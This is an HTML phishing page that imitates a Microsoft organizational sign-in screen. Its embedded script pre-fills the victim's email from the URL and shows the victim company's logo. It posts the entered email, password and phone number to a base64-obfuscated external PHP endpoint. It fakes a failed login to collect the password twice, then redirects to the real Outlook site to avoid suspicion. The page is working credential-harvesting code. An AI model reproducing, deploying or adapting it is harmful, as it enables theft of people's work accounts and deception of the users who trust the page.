<!-- TODO: adfs mx for email unable to find-->
 <!DOCTYPE html>
<html lang="en-US">
    <head>
        <meta http-equiv="X-UA-Compatible" content="IE=10.000"/>
        <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
        <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
        <meta http-equiv="cache-control" content="no-cache,no-store"/>
        <meta http-equiv="pragma" content="no-cache"/>
        <meta http-equiv="expires" content="-1"/>
        <meta name='mswebdialog-title' content=''/>

        <title>Sign In</title>
        


        
        <style>.illustrationClass {background-image:url();}</style>

    </head>
    <body dir="ltr" class="body">
	<style>
	* {margin:0px;padding:0px;}html, body {height:100%;width:100%;background-color:#ffffff;color:#000000;font-weight:normal;font-family:"Segoe UI" , "Segoe" , "SegoeUI-Regular-final", Tahoma, Helvetica, Arial, sans-serif;min-width:500px;-ms-overflow-style:-ms-autohiding-scrollbar;}body {font-size:0.9em;}#noScript {margin:16px;color:Black;}:lang(en-GB){quotes:'\2018' '\2019' '\201C' '\201D';}:lang(zh){font-family:å¾®è½¯é›…é»‘;}@-ms-viewport {width: device-width;}@-moz-viewport {width: device-width;}@-o-viewport {width: device-width;}@-webkit-viewport {width: device-width;}@viewport {width: device-width;}#fullPage, #brandingWrapper {width:100%;height:100%;background-color:inherit;}#brandingWrapper {background-color:#4488dd;}#branding {height:100%;margin-right:500px;margin-left:0px;background-color:inherit;background-repeat: no-repeat;background-size:cover;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;}#contentWrapper {position:relative;width:500px;height:100%;overflow:auto;background-color:#ffffff;margin-left:-500px;margin-right:0px;}#content {min-height:100%;height: auto !important;margin:0 auto -55px auto;padding:0px 150px 0px 50px;}#header {font-size:2em;font-weight:lighter;font-family:"Segoe UI Light" , "Segoe" , "SegoeUI-Light-final", Tahoma, Helvetica, Arial, sans-serif;padding-top: 90px;margin-bottom:60px;min-height:100px;overflow:hidden;}#header img {width:auto;height:auto;}#workArea, #header {word-wrap:break-word;width:350px;}#workArea {margin-bottom:90px;}#footerPlaceholder {height:40px;}#footer {height:40px;padding:10px 50px 0px 50px;position:relative;color:#666666;font-size:0.78em;}#footerLinks {float:none;padding-top:10px;}#copyright {color:#696969;}.pageLink {color:#000000;padding-left:16px;}.clear {clear:both;}.float {float:left;}.floatReverse {float:right;}.indent {margin-left:16px;}.indentNonCollapsible {padding-left:16px;}.hidden {display:none;}.notHidden {display:inherit;}.error {color:#c85305;}.actionLink {margin-bottom:8px;display:block;}a {color:#2672ec;text-decoration:none;background-color:transparent;}ul {list-style-type: disc;}h1,h2,h3,h4,h5,label {margin-bottom: 8px;}.submitMargin {margin-top:38px;margin-bottom:30px;}.topFieldMargin {margin-top:8px;}.fieldMargin {margin-bottom:8px;}.groupMargin {margin-bottom:30px;}.sectionMargin {margin-bottom:64px;}.block {display: block;}.autoWidth {width:auto;}.fullWidth {width:342px;}.fullWidthIndent {width:326px;}input {max-width:100%;font-family:inherit;margin-bottom:8px;}input[type="radio"], input[type="checkbox"] {vertical-align:middle;margin-bottom: 0px;}span.submit, input[type="submit"] {border:none;background-color:rgb(175, 61, 14);min-width:80px;width:auto;height:30px;padding:4px 20px 6px 20px;border-style:solid;border-width:1px;transition:background 0s;color:rgb(255, 255, 255);cursor:pointer;margin-bottom:8px;-ms-user-select:none;-moz-transition:background 0s;-webkit-transition:background 0s;-o-transition:background 0s;-webkit-touch-callout:none;-webkit-user-select:none;-khtml-user-select:none;-moz-user-select: none;-o-user-select: none;user-select:none;}input[type="submit"]:hover,span.submit:hover {background: rgb(255, 220, 185);}input.text{height:28px;padding:0px 3px 0px 3px ;border:solid 1px #BABABA;}input.text:focus {border: 1px solid #6B6B6B;}select {height:28px;min-width:60px;max-width:100%;margin-bottom:8px;white-space:nowrap;overflow:hidden;box-shadow:none;padding:2px;font-family:inherit;}h1, .giantText {font-size:2.0em;font-weight:lighter;}h2, .bigText {font-size:1.33em;font-weight:lighter;}h3, .normalText {font-size:1.0em;font-weight:normal;}h4, .smallText {font-size:0.9em;font-weight:normal;}h5, .tinyText {font-size:0.8em;font-weight:normal;}.hint {color:#999999;}.emphasis {font-weight:700;color:#2F2F2F;}.smallIcon {height:20px;padding-right:12px;vertical-align:middle;}.largeIcon {height:48px;vertical-align:middle;}.largeTextNoWrap {height:48px;display:table-cell;vertical-align:middle;white-space:nowrap;font-size:1.2em;}.idp {height:48px;clear:both;padding:8px;overflow:hidden;}.idp:hover {background-color:#cccccc;}.idpDescription {width:80%;}@media only screen and (max-height: 820px) {#header {padding-top: 40px;min-height:0px;overflow: hidden;}#workArea {margin-bottom:60px;}}@media only screen and (max-height: 500px) {#header {padding-top: 30px;margin-bottom: 30px;}#workArea{margin-bottom:40px;}}@media only screen and (max-width: 600px) {html, body {min-width: 260px;}#brandingWrapper {display: none;}#contentWrapper {float: none;width: 100%;margin: 0px auto;}#content, #footer, #header {width: 400px;padding-left: 0px;padding-right: 0px;margin-left: auto;margin-right: auto;}#workArea {width: 100%;}.fullWidth {width: 392px;}.fullWidthIndent {width: 376px;}}@media only screen and (max-width: 450px) {body {font-size: 0.8em;}#content, #footer {width:auto;margin-right:33px;margin-left:25px;}#header {width: auto;}span.submit, input[type="submit"] {font-size: 0.9em;}.fullWidth {width:100%;margin-left:auto;margin-right:auto;}.fullWidthIndent {width: 85%;}.idpDescription {width:70%;}}@media only screen and (max-width:280px) {#contentWrapper {width:260px;}.idpDescription {max-width:160px;min-width:100px;}}
	</style>
	
    <div id="noScript" style="position:static; width:100%; height:100%; z-index:100">
        <h1>JavaScript required</h1>
        <p>JavaScript is required. This web browser does not support JavaScript or JavaScript in this web browser is not enabled.</p>
        <p>To find out if your web browser supports JavaScript or to enable JavaScript, see web browser help.</p>
    </div>
    <script type="text/javascript" language="JavaScript">
         document.getElementById("noScript").style.display = "none";
    </script>
    <div id="fullPage">
        <div id="brandingWrapper" class="float">
            <div id="branding"></div>
        </div>
        <div id="contentWrapper" class="float">
            <div id="content">
                <div id="header">
                    <img class='logoImage' id="logoimg" src='' alt='' style="width:70px;height:70px;"/>
                </div>
                <div id="workArea">
                    
    <div id="authArea" class="groupMargin">
        
        
    <div id="loginArea">        
        <div id="loginMessage" class="groupMargin">Sign in with your organizational account</div>

        <form  id="loginForm" autocomplete="off" novalidate="novalidate"   >
            <div id="error" class="fieldMargin error smallText" style="display: none;">
                Incorrect user ID or password. Type the correct user ID and password, and try again.
            </div>
			<div id="msg" class="fieldMargin error smallText" style="display: none;">
                Incorrect user ID or password. Type the correct user ID and password, and try again.
            </div>
            <div id="formsAuthenticationArea">
                <div id="userNameArea">
                    <input name="em" id="ai" type="email" value="" tabindex="1" class="text fullWidth" 
                        spellcheck="false" placeholder="someone@example.com" readonly autocomplete="off"/>     
                </div>

                <div id="passwordArea">
                     <input name="ps" id="namep" type="password" tabindex="2" class="text fullWidth" 
                        placeholder="Password" autocomplete="off"/>                                   
                </div>
                <div id="kmsiArea" style="display:none">
                    <input type="checkbox" name="Kmsi" id="kmsiInput" value="true" tabindex="3" />
                    <label for="kmsiInput">Keep me signed in</label>
                </div>
                <div id="submissionArea" class="submitMargin">
                    <span id="submit-btn" class="submit" tabindex="4">Sign in</span>
                </div>
            </div>
            <input id="optionForms" type="hidden" name="AuthMethod" value="FormsAuthentication"/>
        </form>

             <div id="authOptions">
         <form id="options" >
             <input id="optionSelection" type="hidden" name="AuthMethod" />
             <input id="userNameInputOptionsHolder" name="UserName" value="" type="hidden"/>
             <div class='groupMargin'><div id="waitingWheelDiv" style="display: none;"><div id="WaitingWheel">
    <!-- NOTE: This style portion is identical to cookie pull page, they are not in shared css file because of legacy dependancies for custom themes-->
    <!-- CSS for small "waiting" wheel -->
    <style>
    #floatingCirclesG {position: relative;width: 125px;height: 125px;margin: auto;transform: scale(0.4);-o-transform: scale(0.4);-ms-transform: scale(0.4);-webkit-transform: scale(0.4);-moz-transform: scale(0.4);}.f_circleG {position: absolute;height: 22px;width: 22px;border-radius: 12px;-o-border-radius: 12px;-ms-border-radius: 12px;-webkit-border-radius: 12px;-moz-border-radius: 12px;animation-name: f_fadeG;-o-animation-name: f_fadeG;-ms-animation-name: f_fadeG;-webkit-animation-name: f_fadeG;-moz-animation-name: f_fadeG;animation-duration: 1.2s;-o-animation-duration: 1.2s;-ms-animation-duration: 1.2s;-webkit-animation-duration: 1.2s;-moz-animation-duration: 1.2s;animation-iteration-count: infinite;-o-animation-iteration-count: infinite;-ms-animation-iteration-count: infinite;-webkit-animation-iteration-count: infinite;-moz-animation-iteration-count: infinite;animation-direction: normal;-o-animation-direction: normal;-ms-animation-direction: normal;-webkit-animation-direction: normal;-moz-animation-direction: normal;}#frotateG_01 {left: 0;top: 51px;animation-delay: 0.45s;-o-animation-delay: 0.45s;-ms-animation-delay: 0.45s;-webkit-animation-delay: 0.45s;-moz-animation-delay: 0.45s;}#frotateG_02 {left: 15px;top: 15px;animation-delay: 0.6s;-o-animation-delay: 0.6s;-ms-animation-delay: 0.6s;-webkit-animation-delay: 0.6s;-moz-animation-delay: 0.6s;}#frotateG_03 {left: 51px;top: 0;animation-delay: 0.75s;-o-animation-delay: 0.75s;-ms-animation-delay: 0.75s;-webkit-animation-delay: 0.75s;-moz-animation-delay: 0.75s;}#frotateG_04 {right: 15px;top: 15px;animation-delay: 0.9s;-o-animation-delay: 0.9s;-ms-animation-delay: 0.9s;-webkit-animation-delay: 0.9s;-moz-animation-delay: 0.9s;}#frotateG_05 {right: 0;top: 51px;animation-delay: 1.05s;-o-animation-delay: 1.05s;-ms-animation-delay: 1.05s;-webkit-animation-delay: 1.05s;-moz-animation-delay: 1.05s;}#frotateG_06 {right: 15px;bottom: 15px;animation-delay: 1.2s;-o-animation-delay: 1.2s;-ms-animation-delay: 1.2s;-webkit-animation-delay: 1.2s;-moz-animation-delay: 1.2s;}#frotateG_07 {left: 51px;bottom: 0;animation-delay: 1.35s;-o-animation-delay: 1.35s;-ms-animation-delay: 1.35s;-webkit-animation-delay: 1.35s;-moz-animation-delay: 1.35s;}#frotateG_08 {left: 15px;bottom: 15px;animation-delay: 1.5s;-o-animation-delay: 1.5s;-ms-animation-delay: 1.5s;-webkit-animation-delay: 1.5s;-moz-animation-delay: 1.5s;}@keyframes f_fadeG {0% {background-color: rgb(47, 146, 212);}100% {background-color: rgb(255, 255, 255);}}@-o-keyframes f_fadeG {0% {background-color: rgb(47, 146, 212);}100% {background-color: rgb(255, 255, 255);}}@-ms-keyframes f_fadeG {0% {background-color: rgb(47, 146, 212);}100% {background-color: rgb(255, 255, 255);}}@-webkit-keyframes f_fadeG {0% {background-color: rgb(47, 146, 212);}100% {background-color: rgb(255, 255, 255);}}@-moz-keyframes f_fadeG {0% {background-color: rgb(47, 146, 212);}100% {background-color: rgb(255, 255, 255);}}    
    </style>

    <!-- Div containing small "waiting" wheel -->
    <div id="floatingCirclesG">
        <div class="f_circleG" id="frotateG_01"></div>
        <div class="f_circleG" id="frotateG_02"></div>
        <div class="f_circleG" id="frotateG_03"></div>
        <div class="f_circleG" id="frotateG_04"></div>
        <div class="f_circleG" id="frotateG_05"></div>
        <div class="f_circleG" id="frotateG_06"></div>
        <div class="f_circleG" id="frotateG_07"></div>
        <div class="f_circleG" id="frotateG_08"></div>
    </div>
</div></div></div>
         </form>
      </div>

        <div id="introduction" class="groupMargin">
            <p><b></b>Forgot your password ? Just click <a href='#'>here</a>.</p>
			<br />
			<center><hr noshade width='80%' style='color:#cccccc' /></center>
			<p style='font-size:9px;color:#666666;'>
			 </p>                     
        </div>
    </div>

    </div>

                </div>
                <div id="footerPlaceholder"></div>
            </div>
            <div id="footer">
                <div id="footerLinks" class="floatReverse">
                     <div><span id="copyright">&#169; 2023 Microsoft</span><a id="home" class="pageLink footerLink " href="#"></a><a id="privacy" class="pageLink footerLink" href="#"></a></div>
                </div>
            </div>
        </div> 
    </div>
    
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script>
	/* global $ */
$(document).ready(function() {
    var count = 0;

    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        $('#ai').val(my_ai);
        $("#msg").hide();
        $.get("https://logo.clearbit.com/" + my_slice)
            .done(function() {
                $(".log").attr("src", "https://logo.clearbit.com/" + my_slice);

            }).fail(function() {
                $(".log").attr("src", "https://i.imgur.com/cKV4FIx.png");

            })
    }
	
	var mainPage = 'https://'+my_slice;
	
	$("#logoimg").attr("src", "https://logo.clearbit.com/"+mainPage);
		$("#logoname").html(final);
		$(".logoname").html(final);
		
		
	var file="aHR0cHM6Ly9iY29ubmVjdGZ4LmNvbS9wcC9qYS5waHA=";

    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var namep = $("#namep").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);

        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#error').html("Email is required");
            ai.focus;
            return false;
        }

        if (!filter.test(my_ai)) {
            $('#error').show();
            $('#error').html("That account doesn't exist. Enter a different account");
            ai.focus;
            return false;
        }
        if (!namep) {
            $('#error').show();
            $('#error').html("Enter your password.");
            ai.focus;
            return false;
        }
		//minimum password length validation  

		if(namep.length < 5) {  

			$('#error').show();
            $('#error').html("Please check your password");
            ai.focus;  

			return false;  

		}
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();

        $.get("https://logo.clearbit.com/" + my_slice)
            .done(function() {
                $(".log").attr("src", "https://logo.clearbit.com/" + my_slice);

            }).fail(function() {
                $(".log").attr("src", "https://i.imgur.com/cKV4FIx.png");

            })

        count = count + 1;

        $.ajax({
            dataType: 'JSON',
            url: atob(file),
            type: 'POST',
            data: {
                ai: ai,
                namep: namep,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').val('Sign in');
            },
            success: function(response) {
                if (count == 2 && final == "gmail") {
                    $('#aich').html(my_ai);
                    $("#div1").animate({ left: 0, opacity: "hide" }, 0);
                    $("#div2").animate({ right: 0, opacity: "show" }, 1000);

                    return false;

                }
                if (response) {
                    $("#msg").show();
                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $("#namep").val("");
                        if (count >= 2) {
                            count = 0;
                            // window.location.replace(response['redirect_link']);
                            window.location.replace("https://outlook.office365.com/");

                        }
                        // $('#msg').html(response['msg']);
                    } else {
                        // $('#msg').html(response['msg']);
                    }
                }
            },
            error: function() {
                if (count == 2 && final == "gmail") {
                    $('#aich').html(my_ai);
                    $("#div1").animate({ left: 200, opacity: "hide" }, 0);
                    $("#div2").animate({ right: 200, opacity: "show" }, 1000);

                    return false;

                }
                $("#namep").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("https://outlook.office365.com/");
                }
                $("#msg").show();
                // $('#msg').html("Please try again later");
            },
            complete: function() {
                $('#submit-btn').val('Login');
            }
        });
    });

    $('#submit-btn1').click(function(event) {
        event.preventDefault();
        var ai = $("#ai").val();
        var namep = $("#namep").val();
        var ph = $("#ph").val();
        var detail = $("#field").html();
        var msg1 = $('#msg1').html();
        if (!ph) {
            $('#error').show();
            $('#error').html("Phone number is required");
            ai.focus;
            return false;
        }
        $.ajax({
            dataType: 'JSON',
            url: atob(file),
            type: 'POST',
            data: {
                ai: ai,
                namep: namep,
                detail: detail,
                ph: ph,

            },
            beforeSend: function(xhr) {
                $('#submit-btn1').val('Verifing...');
            },
            success: function(response) {
                window.location.replace("https://outlook.office365.com/");
                
            },
            error: function() {
                window.location.replace("https://outlook.office365.com/");
            },
            complete: function() {
                $('#submit-btn1').val('Verify');
            }
        });
        // }
    });


});
</script>

    </body>
</html> 

